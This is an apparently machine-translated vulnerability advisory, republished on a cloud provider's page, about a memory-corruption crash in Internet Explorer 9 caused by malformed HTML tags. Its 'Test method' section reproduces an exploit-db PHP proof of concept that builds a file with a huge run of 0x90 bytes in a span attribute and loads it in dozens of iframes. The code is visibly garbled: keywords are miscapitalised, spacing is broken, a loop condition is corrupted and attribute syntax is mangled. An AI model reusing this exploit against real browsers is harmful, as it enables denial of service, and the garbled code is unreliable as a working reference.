Microsoft IE 9 malformed HTML Tag Processing Memory Corruption Vulnerability

Source: Internet
Author: User

Release date:
Updated on:

Affected Systems:
Microsoft Internet Explorer 9.x
Description:
--------------------------------------------------------------------------------
Microsoft Internet Explorer is a Web browser launched by Microsoft and is widely used.
 
IE9 has a security vulnerability in processing malformed HTML Tag data. Remote attackers may exploit this vulnerability to cause memory corruption and application crash.
 
<* Source: Jean Pascal Pereira

Link: http://www.exploit-db.com/exploits/22401/
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Set_time_limit (0 );

Ini_set ('memory _ limit ', '300m ');

If (! File_exists ("junk.htm "))
{
$ String = "<span id = '";

For ($ I = 0; I I <24117256; $ I ++)
{
$ String. = "\ x90 ";
}
$ String. = "'> </span> ";

File_put_contents ("junk.htm", $ string );
}

Print "View the sourcecode of the iframe below (right click-> view source): <br/> \ n ";
Print "<iframe style = 'width: 800px; height: 500px; 'src0000'junk.htm'> \ n ";

For ($ I = 0; $ I <60; $ I ++)
{
Print "<iframe style = 'display: none' src}'junk.htm'> \ n ";
}

/* Http://0xffe4.org */

?>

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
Microsoft
---------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
 
Http://www.microsoft.com/windows/ie/default.asp

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.